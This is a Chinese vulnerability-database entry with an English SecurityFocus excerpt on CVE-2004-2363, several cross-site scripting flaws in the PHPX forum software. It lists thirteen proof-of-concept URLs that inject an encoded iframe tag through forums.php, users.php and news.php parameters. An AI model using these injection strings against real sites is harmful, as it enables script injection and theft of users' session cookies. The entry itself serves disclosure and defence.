PHPX多个跨站脚本攻击(XSS)漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107928 漏洞类型 跨站脚本
发布时间 2004-05-05 更新时间 2006-04-07
CVE编号 CVE-2004-2363 CNNVD-ID CNNVD-200412-776
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/24083
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-776
|漏洞详情
PHPX3.0到3.2.6版本的functions.inc.php中的checkURI函数存在规范化前认证漏洞。远程攻击者可以借助十六进制编码标签导致跨站脚本攻击(XSS),该漏洞绕过对文字字符“<”,“>”,“(”和“)”的检查,正如使用到forums.php的limit参数以及其他多种向量。
|漏洞EXP
source: http://www.securityfocus.com/bid/10283/info

It has been reported that PHPX is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input.

These issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials or other attacks.

http://www.example.com/forums.php?forum_id=[VID]&limit=25%3Ciframe%3E
http://www.example.com/forums.php?forum_id=[VID]&topic_id=[VID]&limit=15%3Ciframe%3E
http://www.example.com/users.php?action=&limit=100%3Ciframe%3E
http://www.example.com/users.php?action=view&user_id=[VID]%3E%3Ciframe%3E
http://www.example.com/forums.php?action=post&forum_id=[VID]%3E%3Ciframe%3E
http://www.example.com/forums.php?action=search&search_id=[VID]&limit=25%3E%3Ciframe%3E
http://www.example.com/users.php?action=email&user_id=%3E%3Ciframe%3E
http://www.example.com/users.php?action=view&user_id=[VID]%3E%3Ciframe%3E
http://www.example.com/forums.php?forum_id=[VID]%3E%3Ciframe%3E
http://www.example.com/forums.php?forum_id=[VID]&topic_id=[VID]&limit=%3E%3Ciframe%3E
http://www.example.com/forums.php?action=post&forum_id=[VID]&topic_id=[VID]%3E%3Ciframe%3E
http://www.example.com/news.php?news_id=[VID]%3E%3Ciframe%3E
http://www.example.com/forums.php?forum_id=[VID]&topic_id=[VID]%3E%3Ciframe%3E
|参考资料

来源:XF
名称:phpx-xss(16065)
链接:http://xforce.iss.net/xforce/xfdb/16065
来源:BID
名称:10283
链接:http://www.securityfocus.com/bid/10283
来源:www.phpx.org
链接:http://www.phpx.org/project.php?action=view&project_id=1
来源:BUGTRAQ
名称:20040504VulnerabilitiesInPHPX3.26AndEarlier
链接:http://www.securityfocus.com/archive/1/362230